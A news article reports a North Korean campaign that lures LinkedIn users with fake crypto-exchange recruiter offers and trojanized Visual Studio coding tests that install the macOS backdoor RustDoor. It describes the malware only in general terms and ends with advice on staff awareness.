Sep 16, 2024Ravie LakshmananFinancial Security / Malware
Cybersecurity experts are sounding the alarm about North Korean hackers targeting individuals on LinkedIn with RustDoor malware.
The recent alert comes from Jamf Threat Labs, which documented an attack where a LinkedIn user was approached by someone posing as a recruiter for a legitimate cryptocurrency exchange called STON.fi.
These malevolent activities are part of a larger campaign by North Korean threat actors to breach networks under the guise of job interviews or coding assignments.
The financial and cryptocurrency industries are prime targets for these state-sponsored hackers, aiming to make illegal profits and achieve their political goals.
These attacks involve sophisticated social engineering tactics, targeting employees in decentralized finance, cryptocurrency, and similar sectors, as outlined by the FBI.
North Korean threat actors employ various techniques, including requesting users to execute code or download applications on company devices or networks.
These malicious activities often include asking individuals to perform coding tests that involve executing unfamiliar scripts or packages.
Recent incidents demonstrate an ongoing evolution in the tools used by hackers against their targets.
The latest attack discovered by Jamf tricks victims into downloading a compromised Visual Studio project as part of a coding challenge, leading to the installation of RustDoor malware.
Researchers have named this malware variant Thiefbucket and note that it has evaded detection by most anti-malware tools.
RustDoor, initially identified in a cryptocurrency-focused campaign, emerged as a macOS backdoor and now appears to be linked to North Korean hackers.
VisualStudioHelper, a component of RustDoor, operates as an information stealer, retrieving specified files after tricking users into entering their system password.
The malware uses two different servers for command and control communications, posing a significant threat to organizations in the crypto industry.
It is crucial for businesses to train their employees to be cautious of social media connections requesting software installations and to remain vigilant against sophisticated social engineering tactics employed by threat actors.